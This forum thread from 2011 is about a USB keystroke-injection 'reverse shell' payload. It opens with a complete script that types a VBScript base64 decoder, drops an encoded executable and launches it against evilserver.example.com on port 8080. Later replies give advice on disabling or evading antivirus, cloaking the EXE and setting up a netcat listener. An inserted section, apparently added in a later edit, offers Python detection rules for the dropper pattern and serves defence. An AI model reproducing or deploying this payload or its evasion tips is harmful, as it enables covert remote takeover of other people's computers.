Jose B Posted October 9, 2011

Anyone else having trouble with the Reverse Shell Payload? When it runs, the 2 copy cons work, but when it gets to the cscript I get the error:

c:\decoder.vbs(2 ,32) Microsoft VBScript compilation error: Expected end of statement

Here's a screenshot of cmd.exe when the error occurs: http://cl.joseb.me/AnTM

Script used in the payload (the only difference from the one in the wiki is the DELAYs I added to take the screenshot):

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\reverse.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
DELAY 1500
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
DELAY 1500
STRING c:\reverse.exe evilserver.example.com 8080
DELAY 2000
ENTER
DELAY 2000
STRING exit
ENTER
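From the defender's side, the payload above leaves two observable traces that are worth alerting on: a script host (cscript/wscript) being handed a .vbs together with a .txt input and an .exe output path, and that same .exe starting as a process moments later. The script that does the decoding also carries a fixed content signature (Microsoft.XMLDOM with a bin.base64 element feeding an ADODB.Stream SaveToFile). The following Python is an added example written for this editing pass, not code from the thread or from the Ducky wiki; the log lines are constructed in a simplified Sysmon process-creation style, and the rule names and the log line format are my own assumptions.

```python
import re
from typing import List, Tuple

# The four API touchpoints the posted decoder.vbs relies on to turn a base64
# text file into a binary on disk. All four together in one script is a
# strong content signature for this decode-to-file primitive.
DECODER_MARKERS = ("Microsoft.XMLDOM", "bin.base64", "ADODB.Stream", "SaveToFile")


def looks_like_base64_dropper(script_text: str) -> bool:
    """Return True when every decode-to-file marker appears in the script."""
    lowered = script_text.lower()
    return all(marker.lower() in lowered for marker in DECODER_MARKERS)


# Constructed process-creation events (simplified Sysmon Event ID 1 style, not
# real telemetry). The middle two lines mirror the sequence the posted payload
# produces; the last line is ordinary admin scripting that must not alert.
SAMPLE_LOG = r'''
2011-10-09T12:00:01 pid=1201 ppid=900 image="C:\Windows\System32\cmd.exe" cmdline="cmd"
2011-10-09T12:00:09 pid=1340 ppid=1201 image="C:\Windows\System32\cscript.exe" cmdline="cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe"
2011-10-09T12:00:11 pid=1355 ppid=1201 image="c:\reverse.exe" cmdline="c:\reverse.exe evilserver.example.com 8080"
2011-10-09T12:05:00 pid=1400 ppid=900 image="C:\Windows\System32\cscript.exe" cmdline="cscript C:\Scripts\inventory.vbs"
'''

# Assumed log line layout for the constructed sample above.
EVENT_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) '
    r'image="(?P<image>[^"]*)" cmdline="(?P<cmdline>[^"]*)"$'
)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}


def detect_staged_dropper(log_text: str) -> List[Tuple[str, str, str]]:
    """Correlate two events: a script host given a .vbs plus an .exe path as
    arguments, then that same .exe path starting as a process.
    Returns (timestamp, rule, command line) tuples in log order."""
    alerts: List[Tuple[str, str, str]] = []
    staged_exes = set()  # .exe paths a script host was asked to produce (lowercased)
    for line in log_text.splitlines():
        match = EVENT_RE.match(line.strip())
        if not match:
            continue  # blank or malformed line
        image = match["image"].lower()
        basename = image.rsplit("\\", 1)[-1]
        args = match["cmdline"].split()[1:]  # drop argv[0]
        if basename in SCRIPT_HOSTS:
            has_vbs = any(a.lower().endswith(".vbs") for a in args)
            exe_args = [a.lower() for a in args if a.lower().endswith(".exe")]
            if has_vbs and exe_args:
                staged_exes.update(exe_args)
                alerts.append((match["ts"], "script-host-decodes-to-exe", match["cmdline"]))
        elif image in staged_exes:
            alerts.append((match["ts"], "staged-exe-executed", match["cmdline"]))
    return alerts


if __name__ == "__main__":
    for ts, rule, cmdline in detect_staged_dropper(SAMPLE_LOG):
        print(f"{ts} {rule}: {cmdline}")
```

Run against the constructed sample it raises two alerts for the cscript/reverse.exe pair and stays quiet on the inventory script. The process rule is deliberately agnostic of file names, since an attacker can rename decoder.vbs freely, while the content check in looks_like_base64_dropper is what an endpoint scanner or a script-block collector would apply to the .vbs itself.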
ascorbic Posted October 9, 2011 (edited)

Take a look at the screenshot you posted. Right before the first CONTROL Z you can see the VBScript for decoder.vbs did not finish being copied. Here is the last line:

STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub

The output was only:

STRING binaryStr

This could have happened because something took focus away from the command prompt. Or, what I have been seeing in my testing is that sometimes the ducky pushes strings out too quickly and the machine receiving them can't keep up. I added a STRING_DELAY, which will slow down the output of strings, to iducke.com; give this script a try: http://www.iducke.com/Encoder/IDE/b

Edited October 9, 2011 by ascorbic
Jose B Posted October 10, 2011 (Author)

Yep, it works great now! Thanks :D
cgsilvers Posted October 18, 2011

McAfee Antivirus picks this up as: Artemis!347446FE82BF (Trojan)

Any way around this? Thanks,
Xcellerator Posted October 18, 2011

Disable your AV? Or maybe implementing a cloaked EXE to hide it?
Sl1m Posted October 27, 2011

Hi guys! I'm such a newb :P but can anyone explain to me how to establish a session with the target computer once the payload has been injected? I have no idea how this works! Do you have to specify the IP address of your remote computer (the one you are using to access the target computer), and also what do you have to change on the script before converting it to a bin file? Excuse my newness. Thanks
devenv Posted October 27, 2011

> Hi guys! I'm such a newb :P but can anyone explain to me how to establish a session with the target computer once the payload has been injected? I have no idea how this works! Do you have to specify the IP address of your remote computer (the one you are using to access the target computer), and also what do you have to change on the script before converting it to a bin file? Excuse my newness. Thanks

It's stated in the code:

STRING c:\reverse.exe evilserver.example.com 8080

@wiki you can find how you can set up the receiving end.
Sl1m Posted October 27, 2011

> It's stated in the code:
>
> STRING c:\reverse.exe evilserver.example.com 8080
>
> @wiki you can find how you can set up the receiving end.

Thanks for the reply! I am very unfamiliar with servers. How do I set up one? Sorry again, thanks
Sleven Posted October 27, 2011

> Thanks for the reply! I am very unfamiliar with servers. How do I set up one? Sorry again, thanks

You don't have to set up a server; you could use your personal wifi router with netcat. You would use your public IP address and a port number above 1024. You will need to forward this port in your router and then listen for that port with netcat. I would suggest using this method for legal purposes.
bobbyb1980 Posted October 28, 2011

Anyone get a working metasploit payload past an AV? I know you can use shellcode to do that, but doesn't the victim need to have software installed to run that shellcode? Has anyone tried implementing a Java clickjacking style attack to avoid AV detection?
Xcellerator Posted October 28, 2011

Depends on the AV. I use Avast and, while in a testing environment, I have to disable it to get any payloads past it. Perhaps that's a good thing? ;)